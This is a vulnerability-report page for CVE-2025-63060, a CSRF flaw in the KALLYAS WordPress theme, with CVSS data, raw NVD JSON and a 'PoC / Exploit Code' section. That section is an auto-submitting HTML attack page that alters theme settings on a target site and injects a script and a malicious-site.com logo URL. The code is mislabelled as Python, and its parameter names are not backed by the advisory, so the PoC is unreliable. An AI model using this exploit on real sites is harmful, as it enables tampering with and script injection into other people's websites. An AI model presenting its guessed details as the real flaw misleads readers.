Security Vulnerability Report
中文
CVE-2025-63060 CVSS 4.3 MEDIUM

CVE-2025-63060

Published: 2025-12-09 16:18:12
Last Modified: 2026-04-27 19:16:20

Description

Cross-Site Request Forgery (CSRF) vulnerability in hogash KALLYAS kallyas allows Cross Site Request Forgery.This issue affects KALLYAS: from n/a through < 4.25.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KALLYAS Theme < 4.25.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-63060 KALLYAS Theme --> <!DOCTYPE html> <html> <head> <title>KALLYAS CSRF Exploit</title> </head> <body> <h1>CSRF Attack - KALLYAS Theme</h1> <p>This PoC demonstrates the CSRF vulnerability in KALLYAS theme.</p> <!-- Example: Modify theme settings --> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="kallyas_save_options"> <input type="hidden" name="option_page" value="kallyas_options"> <input type="hidden" name="kallyas_logo_url" value="http://malicious-site.com/malicious-logo.png"> <input type="hidden" name="kallyas_custom_code" value="<script>alert('XSS')</script>"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this, the form was not auto-submitted.</p> <button onclick="document.getElementById('csrfForm').submit()">Submit Attack</button> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63060", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:11.503", "lastModified": "2026-04-27T19:16:20.237", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in hogash KALLYAS kallyas allows Cross Site Request Forgery.This issue affects KALLYAS: from n/a through < 4.25.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}